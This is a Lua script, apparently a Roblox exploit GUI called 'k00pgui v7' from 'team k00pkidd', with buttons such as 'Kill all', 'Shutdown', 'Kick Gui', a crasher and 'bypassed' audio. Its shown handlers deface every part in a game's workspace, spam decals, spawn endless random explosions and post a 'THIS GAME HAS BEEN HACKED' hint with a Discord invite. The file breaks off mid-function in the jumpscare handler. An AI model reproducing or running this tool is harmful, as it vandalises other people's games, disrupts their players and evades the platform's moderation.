-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local ScrollingFrame = Instance.new("ScrollingFrame")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
local _666 = Instance.new("TextButton")
local decal = Instance.new("TextButton")
local disco = Instance.new("TextButton")
local exploudh = Instance.new("TextButton")
local hint = Instance.new("TextButton")
local jump = Instance.new("TextButton")
local kill = Instance.new("TextButton")
local music = Instance.new("TextButton")
local musicbypas = Instance.new("TextButton")
local parts = Instance.new("TextButton")
local r6 = Instance.new("TextButton")
local rain = Instance.new("TextButton")
local realm = Instance.new("TextButton")
local shut = Instance.new("TextButton")
local sky = Instance.new("TextButton")
local toad = Instance.new("TextButton")
local unanchor = Instance.new("TextButton")
local musicbypas2 = Instance.new("TextButton")
local musicbypas3 = Instance.new("TextButton")
local musicbypas4 = Instance.new("TextButton")
local musicbypas5 = Instance.new("TextButton")
local shamsterky = Instance.new("TextButton")
local dreemy = Instance.new("TextButton")
local eses = Instance.new("TextButton")
local antileave = Instance.new("TextButton")
local theme = Instance.new("TextButton")
local thomas = Instance.new("TextButton")
local kick = Instance.new("TextButton")
local Destroy = Instance.new("TextButton")
local gravityhammer = Instance.new("TextButton")
local kaax = Instance.new("TextButton")
local musicbypas6 = Instance.new("TextButton")
local k00pk00p = Instance.new("TextButton")
local infYield = Instance.new("TextButton")
local message = Instance.new("TextButton")
local TextLabel_4 = Instance.new("TextLabel")
local TextLabel_5 = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderColor3 = Color3.fromRGB(1, 53, 10)
Frame.BorderSizePixel = 5
Frame.Position = UDim2.new(0.349955499, 0, 0.372332215, 0)
Frame.Size = UDim2.new(0, 401, 0, 382)

ScrollingFrame.Parent = Frame
ScrollingFrame.Active = true
ScrollingFrame.BackgroundColor3 = Color3.fromRGB(24, 24, 24)
ScrollingFrame.BorderColor3 = Color3.fromRGB(0, 0, 0)
ScrollingFrame.Position = UDim2.new(0.0324189514, 0, 0.0261780098, 0)
ScrollingFrame.Size = UDim2.new(0, 371, 0, 362)

TextLabel.Parent = ScrollingFrame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.271820426, 0, 0.0183245987, 0)
TextLabel.Size = UDim2.new(0, 170, 0, 32)
TextLabel.Font = Enum.Font.Arial
TextLabel.Text = "k00pgui v7"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

TextLabel_2.Parent = TextLabel
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(-0.00465017557, 0, 0.977094233, 0)
TextLabel_2.Size = UDim2.new(0, 170, 0, 32)
TextLabel_2.Font = Enum.Font.Arial
TextLabel_2.Text = "by @k00pkiddAlt      [team k00pkidd]"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

TextLabel_3.Parent = TextLabel_2
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0.442408621, 0, 21.7270947, 0)
TextLabel_3.Size = UDim2.new(0, 170, 0, 14)
TextLabel_3.Font = Enum.Font.Arial
TextLabel_3.Text = "by k00pkiddAlt [team k00pkidd]"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextWrapped = true

_666.Name = "666"
_666.Parent = TextLabel_3
_666.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
_666.BorderColor3 = Color3.fromRGB(0, 53, 11)
_666.Position = UDim2.new(-0.241176382, 0, -43, 0)
_666.Size = UDim2.new(0, 99, 0, 39)
_666.Font = Enum.Font.SourceSans
_666.Text = "666"
_666.TextColor3 = Color3.fromRGB(255, 255, 255)
_666.TextScaled = true
_666.TextSize = 14.000
_666.TextWrapped = true

decal.Name = "decal"
decal.Parent = TextLabel_3
decal.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
decal.BorderColor3 = Color3.fromRGB(0, 53, 11)
decal.Position = UDim2.new(-0.864705801, 0, -46.5, 0)
decal.Size = UDim2.new(0, 99, 0, 39)
decal.Font = Enum.Font.SourceSans
decal.Text = "Decal"
decal.TextColor3 = Color3.fromRGB(255, 255, 255)
decal.TextScaled = true
decal.TextSize = 14.000
decal.TextWrapped = true

disco.Name = "disco"
disco.Parent = TextLabel_3
disco.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
disco.BorderColor3 = Color3.fromRGB(0, 53, 11)
disco.Position = UDim2.new(0.394117713, 0, -32.7142868, 0)
disco.Size = UDim2.new(0, 99, 0, 39)
disco.Font = Enum.Font.SourceSans
disco.Text = "disco"
disco.TextColor3 = Color3.fromRGB(255, 255, 255)
disco.TextScaled = true
disco.TextSize = 14.000
disco.TextWrapped = true

exploudh.Name = "exploudh"
exploudh.Parent = TextLabel_3
exploudh.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
exploudh.BorderColor3 = Color3.fromRGB(0, 53, 11)
exploudh.Position = UDim2.new(-0.247058764, 0, -36.0714302, 0)
exploudh.Size = UDim2.new(0, 99, 0, 39)
exploudh.Font = Enum.Font.SourceSans
exploudh.Text = "Explode random"
exploudh.TextColor3 = Color3.fromRGB(255, 255, 255)
exploudh.TextScaled = true
exploudh.TextSize = 14.000
exploudh.TextWrapped = true

hint.Name = "hint"
hint.Parent = TextLabel_3
hint.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
hint.BorderColor3 = Color3.fromRGB(0, 53, 11)
hint.Position = UDim2.new(0.394117713, 0, -46.5, 0)
hint.Size = UDim2.new(0, 99, 0, 39)
hint.Font = Enum.Font.SourceSans
hint.Text = "Hint"
hint.TextColor3 = Color3.fromRGB(255, 255, 255)
hint.TextScaled = true
hint.TextSize = 14.000
hint.TextWrapped = true

jump.Name = "jump"
jump.Parent = TextLabel_3
jump.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
jump.BorderColor3 = Color3.fromRGB(0, 53, 11)
jump.Position = UDim2.new(0.394117713, 0, -43, 0)
jump.Size = UDim2.new(0, 99, 0, 39)
jump.Font = Enum.Font.SourceSans
jump.Text = "JumpScare"
jump.TextColor3 = Color3.fromRGB(255, 255, 255)
jump.TextScaled = true
jump.TextSize = 14.000
jump.TextWrapped = true

kill.Name = "kill"
kill.Parent = TextLabel_3
kill.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
kill.BorderColor3 = Color3.fromRGB(0, 53, 11)
kill.Position = UDim2.new(0.388235331, 0, -36.0714302, 0)
kill.Size = UDim2.new(0, 99, 0, 39)
kill.Font = Enum.Font.SourceSans
kill.Text = "Kill all"
kill.TextColor3 = Color3.fromRGB(255, 255, 255)
kill.TextScaled = true
kill.TextSize = 14.000
kill.TextWrapped = true

music.Name = "music"
music.Parent = TextLabel_3
music.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
music.BorderColor3 = Color3.fromRGB(0, 53, 11)
music.Position = UDim2.new(-0.882352889, 0, -8.14285851, 0)
music.Size = UDim2.new(0, 99, 0, 39)
music.Font = Enum.Font.SourceSans
music.Text = "c00l music"
music.TextColor3 = Color3.fromRGB(255, 255, 255)
music.TextScaled = true
music.TextSize = 14.000
music.TextWrapped = true

musicbypas.Name = "music bypas"
musicbypas.Parent = TextLabel_3
musicbypas.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
musicbypas.BorderColor3 = Color3.fromRGB(0, 53, 11)
musicbypas.Position = UDim2.new(-0.258823484, 0, -8.14285851, 0)
musicbypas.Size = UDim2.new(0, 99, 0, 39)
musicbypas.Font = Enum.Font.SourceSans
musicbypas.Text = "short phonk"
musicbypas.TextColor3 = Color3.fromRGB(255, 255, 255)
musicbypas.TextScaled = true
musicbypas.TextSize = 14.000
musicbypas.TextWrapped = true

parts.Name = "parts"
parts.Parent = TextLabel_3
parts.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
parts.BorderColor3 = Color3.fromRGB(0, 53, 11)
parts.Position = UDim2.new(-0.864705801, 0, -43, 0)
parts.Size = UDim2.new(0, 99, 0, 39)
parts.Font = Enum.Font.SourceSans
parts.Text = "Particles"
parts.TextColor3 = Color3.fromRGB(255, 255, 255)
parts.TextScaled = true
parts.TextSize = 14.000
parts.TextWrapped = true

r6.Name = "r6"
r6.Parent = TextLabel_3
r6.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
r6.BorderColor3 = Color3.fromRGB(0, 53, 11)
r6.Position = UDim2.new(-0.970588207, 0, -52.4285736, 0)
r6.Size = UDim2.new(0, 53, 0, 24)
r6.Font = Enum.Font.SourceSans
r6.Text = "R6"
r6.TextColor3 = Color3.fromRGB(255, 255, 255)
r6.TextScaled = true
r6.TextSize = 14.000
r6.TextWrapped = true

rain.Name = "rain"
rain.Parent = TextLabel_3
rain.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
rain.BorderColor3 = Color3.fromRGB(0, 53, 11)
rain.Position = UDim2.new(-0.864705801, 0, -32.7142868, 0)
rain.Size = UDim2.new(0, 99, 0, 39)
rain.Font = Enum.Font.SourceSans
rain.Text = "raining fire"
rain.TextColor3 = Color3.fromRGB(255, 255, 255)
rain.TextScaled = true
rain.TextSize = 14.000
rain.TextWrapped = true

realm.Name = "realm"
realm.Parent = TextLabel_3
realm.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
realm.BorderColor3 = Color3.fromRGB(0, 53, 11)
realm.Position = UDim2.new(-0.241176382, 0, -39.5714264, 0)
realm.Size = UDim2.new(0, 99, 0, 39)
realm.Font = Enum.Font.SourceSans
realm.Text = "k00pkidd's realm + antileave"
realm.TextColor3 = Color3.fromRGB(255, 255, 255)
realm.TextScaled = true
realm.TextSize = 14.000
realm.TextWrapped = true

shut.Name = "shut"
shut.Parent = TextLabel_3
shut.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
shut.BorderColor3 = Color3.fromRGB(0, 53, 11)
shut.Position = UDim2.new(-0.241176382, 0, -32.7142868, 0)
shut.Size = UDim2.new(0, 99, 0, 39)
shut.Font = Enum.Font.SourceSans
shut.Text = "Shutdown"
shut.TextColor3 = Color3.fromRGB(255, 255, 255)
shut.TextScaled = true
shut.TextSize = 14.000
shut.TextWrapped = true

sky.Name = "sky"
sky.Parent = TextLabel_3
sky.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
sky.BorderColor3 = Color3.fromRGB(0, 53, 11)
sky.Position = UDim2.new(-0.241176382, 0, -46.5, 0)
sky.Size = UDim2.new(0, 99, 0, 39)
sky.Font = Enum.Font.SourceSans
sky.Text = "SkyBox"
sky.TextColor3 = Color3.fromRGB(255, 255, 255)
sky.TextScaled = true
sky.TextSize = 14.000
sky.TextWrapped = true

toad.Name = "toad"
toad.Parent = TextLabel_3
toad.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
toad.BorderColor3 = Color3.fromRGB(0, 53, 11)
toad.Position = UDim2.new(0.388235331, 0, -39.5714302, 0)
toad.Size = UDim2.new(0, 99, 0, 39)
toad.Font = Enum.Font.SourceSans
toad.Text = "toadroasted remake"
toad.TextColor3 = Color3.fromRGB(255, 255, 255)
toad.TextScaled = true
toad.TextSize = 14.000
toad.TextWrapped = true

unanchor.Name = "unanchor"
unanchor.Parent = TextLabel_3
unanchor.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
unanchor.BorderColor3 = Color3.fromRGB(0, 53, 11)
unanchor.Position = UDim2.new(-0.870588183, 0, -36.0714302, 0)
unanchor.Size = UDim2.new(0, 99, 0, 39)
unanchor.Font = Enum.Font.SourceSans
unanchor.Text = "UnAnchor"
unanchor.TextColor3 = Color3.fromRGB(255, 255, 255)
unanchor.TextScaled = true
unanchor.TextSize = 14.000
unanchor.TextWrapped = true

musicbypas2.Name = "music bypas 2"
musicbypas2.Parent = TextLabel_3
musicbypas2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
musicbypas2.BorderColor3 = Color3.fromRGB(0, 53, 11)
musicbypas2.Position = UDim2.new(0.382353008, 0, -8.14285851, 0)
musicbypas2.Size = UDim2.new(0, 99, 0, 39)
musicbypas2.Font = Enum.Font.SourceSans
musicbypas2.Text = "they gon rumble"
musicbypas2.TextColor3 = Color3.fromRGB(255, 255, 255)
musicbypas2.TextScaled = true
musicbypas2.TextSize = 14.000
musicbypas2.TextWrapped = true

musicbypas3.Name = "music bypas 3"
musicbypas3.Parent = TextLabel_3
musicbypas3.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
musicbypas3.BorderColor3 = Color3.fromRGB(0, 53, 11)
musicbypas3.Position = UDim2.new(-0.876470506, 0, -4.3571434, 0)
musicbypas3.Size = UDim2.new(0, 99, 0, 39)
musicbypas3.Font = Enum.Font.SourceSans
musicbypas3.Text = "you are now entering the world of k00pkidd"
musicbypas3.TextColor3 = Color3.fromRGB(255, 255, 255)
musicbypas3.TextScaled = true
musicbypas3.TextSize = 14.000
musicbypas3.TextWrapped = true

musicbypas4.Name = "music bypas 4"
musicbypas4.Parent = TextLabel_3
musicbypas4.Active = false
musicbypas4.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
musicbypas4.BorderColor3 = Color3.fromRGB(0, 53, 11)
musicbypas4.Position = UDim2.new(-0.258823454, 0, -4.3571434, 0)
musicbypas4.Size = UDim2.new(0, 99, 0, 39)
musicbypas4.Font = Enum.Font.SourceSans
musicbypas4.Text = "new bypassed music"
musicbypas4.TextColor3 = Color3.fromRGB(255, 255, 255)
musicbypas4.TextScaled = true
musicbypas4.TextSize = 14.000
musicbypas4.TextWrapped = true

musicbypas5.Name = "music bypas 5"
musicbypas5.Parent = TextLabel_3
musicbypas5.Active = false
musicbypas5.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
musicbypas5.BorderColor3 = Color3.fromRGB(0, 53, 11)
musicbypas5.Position = UDim2.new(0.376470685, 0, -4.3571434, 0)
musicbypas5.Size = UDim2.new(0, 99, 0, 39)
musicbypas5.Font = Enum.Font.SourceSans
musicbypas5.Text = "idfk what this is"
musicbypas5.TextColor3 = Color3.fromRGB(255, 255, 255)
musicbypas5.TextScaled = true
musicbypas5.TextSize = 14.000
musicbypas5.TextWrapped = true

shamsterky.Name = "shamsterky"
shamsterky.Parent = TextLabel_3
shamsterky.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
shamsterky.BorderColor3 = Color3.fromRGB(0, 53, 11)
shamsterky.Position = UDim2.new(-0.870588183, 0, -13.9285717, 0)
shamsterky.Size = UDim2.new(0, 99, 0, 39)
shamsterky.Font = Enum.Font.SourceSans
shamsterky.Text = "funny hamster doing melting a funny thing skybox"
shamsterky.TextColor3 = Color3.fromRGB(255, 255, 255)
shamsterky.TextScaled = true
shamsterky.TextSize = 14.000
shamsterky.TextWrapped = true

dreemy.Name = "dreemy"
dreemy.Parent = TextLabel_3
dreemy.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
dreemy.BorderColor3 = Color3.fromRGB(0, 53, 11)
dreemy.Position = UDim2.new(-0.223529339, 0, -13.9285717, 0)
dreemy.Size = UDim2.new(0, 99, 0, 39)
dreemy.Font = Enum.Font.SourceSans
dreemy.Text = "ambatakam sky"
dreemy.TextColor3 = Color3.fromRGB(255, 255, 255)
dreemy.TextScaled = true
dreemy.TextSize = 14.000
dreemy.TextWrapped = true

eses.Name = "eses"
eses.Parent = TextLabel_3
eses.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
eses.BorderColor3 = Color3.fromRGB(0, 53, 11)
eses.Position = UDim2.new(-0.870588183, 0, -39.5714302, 0)
eses.Size = UDim2.new(0, 99, 0, 39)
eses.Font = Enum.Font.SourceSans
eses.Text = "IS1S JumpScare"
eses.TextColor3 = Color3.fromRGB(255, 255, 255)
eses.TextScaled = true
eses.TextSize = 14.000
eses.TextWrapped = true

antileave.Name = "antileave"
antileave.Parent = TextLabel_3
antileave.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
antileave.BorderColor3 = Color3.fromRGB(0, 53, 11)
antileave.Position = UDim2.new(-0.870588183, 0, -29.3571453, 0)
antileave.Size = UDim2.new(0, 99, 0, 39)
antileave.Font = Enum.Font.SourceSans
antileave.Text = "Insert Anti-Leave [OP WARNING]"
antileave.TextColor3 = Color3.fromRGB(255, 255, 255)
antileave.TextScaled = true
antileave.TextSize = 14.000
antileave.TextWrapped = true

theme.Name = "theme"
theme.Parent = TextLabel_3
theme.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
theme.BorderColor3 = Color3.fromRGB(0, 53, 11)
theme.Position = UDim2.new(-0.970588207, 0, -50.0714264, 0)
theme.Size = UDim2.new(0, 53, 0, 24)
theme.Font = Enum.Font.SourceSans
theme.Text = "play k00p's theme"
theme.TextColor3 = Color3.fromRGB(255, 255, 255)
theme.TextScaled = true
theme.TextSize = 14.000
theme.TextWrapped = true

thomas.Name = "thomas"
thomas.Parent = TextLabel_3
thomas.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
thomas.BorderColor3 = Color3.fromRGB(0, 53, 11)
thomas.Position = UDim2.new(-0.241176412, 0, -29.3571453, 0)
thomas.Size = UDim2.new(0, 99, 0, 39)
thomas.Font = Enum.Font.SourceSans
thomas.Text = "become thomas [R6 only]"
thomas.TextColor3 = Color3.fromRGB(255, 255, 255)
thomas.TextScaled = true
thomas.TextSize = 14.000
thomas.TextWrapped = true

kick.Name = "kick"
kick.Parent = TextLabel_3
kick.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
kick.BorderColor3 = Color3.fromRGB(0, 53, 11)
kick.Position = UDim2.new(0.394117713, 0, -29.3571453, 0)
kick.Size = UDim2.new(0, 99, 0, 39)
kick.Font = Enum.Font.SourceSans
kick.Text = "Kick Gui"
kick.TextColor3 = Color3.fromRGB(255, 255, 255)
kick.TextScaled = true
kick.TextSize = 14.000
kick.TextWrapped = true

Destroy.Name = "Destroy."
Destroy.Parent = TextLabel_3
Destroy.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Destroy.BorderColor3 = Color3.fromRGB(0, 53, 11)
Destroy.Position = UDim2.new(-0.864705861, 0, -26, 0)
Destroy.Size = UDim2.new(0, 311, 0, 35)
Destroy.Font = Enum.Font.SourceSans
Destroy.Text = "Destroy. [ONLY FOR EMERGENCY]"
Destroy.TextColor3 = Color3.fromRGB(255, 255, 255)
Destroy.TextScaled = true
Destroy.TextSize = 14.000
Destroy.TextWrapped = true

gravityhammer.Name = "gravity hammer"
gravityhammer.Parent = TextLabel_3
gravityhammer.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
gravityhammer.BorderColor3 = Color3.fromRGB(0, 53, 11)
gravityhammer.Position = UDim2.new(-0.864705801, 0, -22.785717, 0)
gravityhammer.Size = UDim2.new(0, 99, 0, 39)
gravityhammer.Font = Enum.Font.SourceSans
gravityhammer.Text = "Gravity Hammer"
gravityhammer.TextColor3 = Color3.fromRGB(255, 255, 255)
gravityhammer.TextScaled = true
gravityhammer.TextSize = 14.000
gravityhammer.TextWrapped = true

kaax.Name = "kaax"
kaax.Parent = TextLabel_3
kaax.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
kaax.BorderColor3 = Color3.fromRGB(0, 53, 11)
kaax.Position = UDim2.new(-0.223529398, 0, -22.785717, 0)
kaax.Size = UDim2.new(0, 99, 0, 39)
kaax.Font = Enum.Font.SourceSans
kaax.Text = "Kaax Script"
kaax.TextColor3 = Color3.fromRGB(255, 255, 255)
kaax.TextScaled = true
kaax.TextSize = 14.000
kaax.TextWrapped = true

musicbypas6.Name = "music bypas 6"
musicbypas6.Parent = TextLabel_3
musicbypas6.Active = false
musicbypas6.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
musicbypas6.BorderColor3 = Color3.fromRGB(0, 53, 11)
musicbypas6.Position = UDim2.new(0.417647153, 0, -22.7857151, 0)
musicbypas6.Size = UDim2.new(0, 99, 0, 39)
musicbypas6.Font = Enum.Font.SourceSans
musicbypas6.Text = "Kaax's Music"
musicbypas6.TextColor3 = Color3.fromRGB(255, 255, 255)
musicbypas6.TextScaled = true
musicbypas6.TextSize = 14.000
musicbypas6.TextWrapped = true

k00pk00p.Name = "k00pk00p"
k00pk00p.Parent = TextLabel_3
k00pk00p.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
k00pk00p.BorderColor3 = Color3.fromRGB(0, 53, 11)
k00pk00p.Position = UDim2.new(-0.864705801, 0, -19.5000019, 0)
k00pk00p.Size = UDim2.new(0, 99, 0, 39)
k00pk00p.Font = Enum.Font.SourceSans
k00pk00p.Text = "k00p k00p [Noot Noot Crasher]"
k00pk00p.TextColor3 = Color3.fromRGB(255, 255, 255)
k00pk00p.TextScaled = true
k00pk00p.TextSize = 14.000
k00pk00p.TextWrapped = true

infYield.Name = "infYield"
infYield.Parent = TextLabel_3
infYield.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
infYield.BorderColor3 = Color3.fromRGB(0, 53, 11)
infYield.Position = UDim2.new(-0.223529339, 0, -19.5000019, 0)
infYield.Size = UDim2.new(0, 99, 0, 39)
infYield.Font = Enum.Font.SourceSans
infYield.Text = "Infinite Yield"
infYield.TextColor3 = Color3.fromRGB(255, 255, 255)
infYield.TextScaled = true
infYield.TextSize = 14.000
infYield.TextWrapped = true

message.Name = "message"
message.Parent = TextLabel_3
message.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
message.BorderColor3 = Color3.fromRGB(0, 53, 11)
message.Position = UDim2.new(0.417647123, 0, -19.5, 0)
message.Size = UDim2.new(0, 99, 0, 39)
message.Font = Enum.Font.SourceSans
message.Text = "Message"
message.TextColor3 = Color3.fromRGB(255, 255, 255)
message.TextScaled = true
message.TextSize = 14.000
message.TextWrapped = true

TextLabel_4.Parent = TextLabel_2
TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.BackgroundTransparency = 1.000
TextLabel_4.Position = UDim2.new(0.0071145324, 0, 17.1645947, 0)
TextLabel_4.Size = UDim2.new(0, 170, 0, 32)
TextLabel_4.Font = Enum.Font.Arial
TextLabel_4.Text = "-- BYPASSED AUDIOS --"
TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.TextScaled = true
TextLabel_4.TextSize = 14.000
TextLabel_4.TextWrapped = true

TextLabel_5.Parent = TextLabel_2
TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_5.BackgroundTransparency = 1.000
TextLabel_5.Position = UDim2.new(0.0188792385, 0, 14.6333447, 0)
TextLabel_5.Size = UDim2.new(0, 170, 0, 32)
TextLabel_5.Font = Enum.Font.Arial
TextLabel_5.Text = "-- FUNNI TROLLS  --"
TextLabel_5.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_5.TextScaled = true
TextLabel_5.TextSize = 14.000
TextLabel_5.TextWrapped = true

-- Module Scripts:

local fake_module_scripts = {}

do -- nil.FakeMouse
	local script = Instance.new('ModuleScript', nil)
	script.Name = "FakeMouse"
	local function module_script()
		local Converter = {}
		script.Client.Disabled = false -- enables the client
		
		
		Converter.LocalPlayer = nil
		local Plr = nil -- temp
		
		
		script.GetPlr.OnServerEvent:Connect(function(Plrr)
			Plr = Plrr
		end)
		
		
		
		-- A LIST OF ALL FUNCTIONS / EVENTS / PROPERTIES --
		
		repeat wait() until Plr
		
		function Converter:GetPlr()
			return script.GetPlrE:InvokeClient(Plr)
		end
		
		
		Converter.LocalPlayer = Plr
		
		return Converter
	end
	fake_module_scripts[script] = module_script
end


-- Scripts:

local function TRQLPO_fake_script() -- _666.Script 
	local script = Instance.new('Script', _666)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		for i,v in next,workspace:children''do
			if(v:IsA'BasePart')then
				me=v;
				bbg=Instance.new('BillboardGui',me);
				bbg.Name='stuf';
				bbg.Adornee=me;
				bbg.Size=UDim2.new(2.5,0,2.5,0)
				--bbg.StudsOffset=Vector3.new(0,2,0)
				tlb=Instance.new'TextLabel';
				tlb.Text='666 666 666 666 666 666';
				tlb.Font='SourceSansBold';
				tlb.FontSize='Size48';
				tlb.TextColor3=Color3.new(1,0,0);
				tlb.Size=UDim2.new(1.25,0,1.25,0);
				tlb.Position=UDim2.new(-0.125,-22,-1.1,0);
				tlb.BackgroundTransparency=1;
				tlb.Parent=bbg;
			end;end;
		function xds(dd)
			for i,v in next,dd:children''do
				if(v:IsA'BasePart')then
					v.BrickColor=BrickColor.new'Really black';
					v.TopSurface='Smooth';
					v.BottomSurface='Smooth';
					s=Instance.new('SelectionBox',v);
					s.Adornee=v;
					s.Color=BrickColor.new'Really red';
					a=Instance.new('PointLight',v);
					a.Color=Color3.new(1,0,0);
					a.Range=15;
					a.Brightness=5;
					f=Instance.new('Fire',v);
					f.Size=19;
					f.Heat=22;
				end;
	
				local dec = 'http://www.roblox.com/asset/?id=19399245';
				local fac = {'Front', 'Back', 'Left', 'Right', 'Top', 'Bottom'}
				--coroutine.wrap(function()
				--for ,_ in pairs(fac) do
				--local ddec = Instance.new("Decal", v)
				--ddec.Face = 
				--ddec.Texture = dec
				--end end)()
				if #(v:GetChildren())>0 then
					xds(v) 
				end
			end
		end
		xds(game.Workspace)
	end)
	
end
coroutine.wrap(TRQLPO_fake_script)()
local function CWJGIZ_fake_script() -- decal.Script 
	local script = Instance.new('Script', decal)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function click()
		function exPro(root)
			for _, v in pairs(root:GetChildren()) do
				if v:IsA("Decal") and v.Texture ~= "http://www.roblox.com/asset/?id=9422866248" then
					v.Parent = nil
				elseif v:IsA("BasePart") then
					v.Material = "Plastic"
					v.Transparency = 0
					local One = Instance.new("Decal", v)
					local Two = Instance.new("Decal", v)
					local Three = Instance.new("Decal", v)
					local Four = Instance.new("Decal", v)
					local Five = Instance.new("Decal", v)
					local Six = Instance.new("Decal", v)
					One.Texture = "http://www.roblox.com/asset/?id=9422866248"
					Two.Texture = "http://www.roblox.com/asset/?id=9422866248"
					Three.Texture = "http://www.roblox.com/asset/?id=9422866248"
					Four.Texture = "http://www.roblox.com/asset/?id=9422866248"
					Five.Texture = "http://www.roblox.com/asset/?id=9422866248"
					Six.Texture = "http://www.roblox.com/asset/?id=9422866248"
					One.Face = "Front"
					Two.Face = "Back"
					Three.Face = "Right"
					Four.Face = "Left"
					Five.Face = "Top"
					Six.Face = "Bottom"
				end
				exPro(v)
			end
		end
		function asdf(root)
			for _, v in pairs(root:GetChildren()) do
				asdf(v)
			end
		end
		exPro(game.Workspace)
		asdf(game.Workspace)
	end
	
	script.Parent.MouseButton1Down:connect(click)
end
coroutine.wrap(CWJGIZ_fake_script)()
local function APSFL_fake_script() -- disco.Script 
	local script = Instance.new('Script', disco)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		local Lighting = game:GetService("Lighting")
		local ColorCorrection = Instance.new("ColorCorrectionEffect", Lighting)
	
		function zigzag(X) 
			return math.acos(math.cos(X*math.pi))/math.pi
		end
	
		Counter = 0
	
		Lighting.TimeOfDay = "12:00"
	
		while wait(0.1) do 
			ColorCorrection.TintColor = Color3.fromHSV(zigzag(Counter),1,1)
			Lighting.Ambient = Color3.fromHSV(zigzag(Counter),1,1)
			Counter += 0.01
		end
	end)
end
coroutine.wrap(APSFL_fake_script)()
local function QUJXCK_fake_script() -- exploudh.Script 
	local script = Instance.new('Script', exploudh)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Down:Connect(function()
		while true do
			explosion = Instance.new("Explosion")
			explosion.Position =  Vector3.new(math.random(-500,500),math.random(1,500),math.random(-500,500))
			explosion.Parent = game.Workspace
			wait()
		end
	end)
end
coroutine.wrap(QUJXCK_fake_script)()
local function SQEDV_fake_script() -- exploudh.LocalScript 
	local script = Instance.new('LocalScript', exploudh)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.RemoteEvent:FireServer()
	end)
end
coroutine.wrap(SQEDV_fake_script)()
local function VRYTC_fake_script() -- hint.Script 
	local script = Instance.new('Script', hint)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		local m = Instance.new("Hint", game.workspace)
		m.Text = "TEAM K00PKIDD HAS HACKED THIS GAME. | DISC INVITE: .gg/vykYEeGDBF |"
	end)
end
coroutine.wrap(VRYTC_fake_script)()
local function FKAS_fake_script() -- jump.Script 
	local script = Instance.new('Script', jump)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
